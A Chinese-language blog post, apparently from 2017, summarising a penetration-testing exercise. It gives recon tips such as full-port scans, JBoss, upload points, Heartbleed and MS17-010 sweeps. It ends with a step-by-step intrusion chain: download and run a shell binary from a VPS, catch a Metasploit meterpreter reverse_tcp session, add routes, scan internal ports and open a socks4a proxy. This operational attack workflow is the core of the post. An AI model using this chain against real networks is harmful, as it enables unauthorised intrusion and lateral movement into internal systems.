您的位置:首页 > 其它

某活动技术点总结

2017-12-04 22:53 211 查看
因为特殊原因,所以只记录心得技术点,看不懂就别看了。

情报就是一切。

这句话真的是让我觉得汗颜无比啊。

开场别人已经拿shell了,我还摸不着北。nmap没毛病,结果别人jboss拿的shell。

这个地方记住,关键IP要-p-,扫描全端口,不能放过。

弱口令要检查上传点,上传点要多发掘,如果一个不能绕过就要去尝试另外的,把链接都点一下,万一就有隐藏的上传点。

x站其实难度都不大,就是看谁信息收集比较全面,谁比较细心罢了。

站群当我没说,恶心不死人,但是说不定旁站有惊喜。

另外Oracle可以getshell,参见下一篇博文。

谁说老的洞就没用,心脏滴血说不定就能起奇效。

第一次真正意义的进了内网,要记得sock4a模块可以开个sock代理转发出来,接收可以用proxyfilter。

进内网有很大可能nmap不能扫,网络好的情况下可以用msf的portscan,注意要用tcp,如果是syn扫描要root权限。

nmap扫不了有可能因为你nmap有问题,但最大可能是IDC机房封了namp,国内内网最好用国内VPS(所以要授权)。

看情况,没时间就直接ms17-010扫一遍B段,看运气咯。

时间充足就sock4a转出来,普通测试套路来一套咯。虽然很多时候都是弱口令巴拉巴拉。

才出来的大洞来一套,基本都会有中招的。反正就是老套路。

最后加上一个一条龙进内网的套路。

首先获取一个shell,045、上传之类的:

1.wget一个vps上的shell

2.chmod 777 shell.elf

3. ./shell.elf &

4.进msfconsole,开启handler监听

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set LHOST xxxxxx

set LPORT xxxx

exploit -j

5.成功获取会话之后,进shell之后是exit来退出,meterpreter是background,扫描前记得添加路由表 

0/24是C段,0/16是B段

6.端口扫描除了nmap还有msf自带的

use auxiliary/scanner/portscan/syn

set PORTS 80,8080,6379,7001,8080,8009

set RHOSTS xxxxxx

set THERADS 10

exploit

端口就设置点常用的就行了,网络状态不好就线程开低点。

7.sock4a代理

use auxiliary/server/socks4a

exploit -y

让他后台慢慢运行就好了,本地用proxyfilter接,52有破解。

大概就是这样,这次收获颇多,很多理论上的东西得到了验证。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: